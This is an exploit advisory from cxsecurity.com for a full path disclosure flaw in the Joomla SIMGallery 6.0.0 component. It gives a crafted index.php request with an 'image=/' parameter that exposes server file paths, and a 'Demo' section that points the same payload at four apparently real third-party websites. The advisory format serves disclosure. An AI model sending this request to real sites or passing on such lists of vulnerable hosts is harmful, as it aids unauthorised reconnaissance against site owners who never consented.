Joomla Component SIMGallery 6.0.0 - Full Path Disclosure

Published
Credit
Risk
2017.05.19
Persian Hack Team
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Exploit Title: Joomla Component SIMGallery 6.0.0 - Full Path Disclosure
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Home : https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/simgallery/
# Home : http://persian-team.ir/
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-18

# POC :
# Full Path Disclosure :
https://www.target.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
And Response is :
Error: requested file is not an accepted type:

#Demo :
http://neurosurgic.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://sniperpitching.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://www.bitartean.net/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://www.demoiselles.eu/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

References:

http://persian-team.ir/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com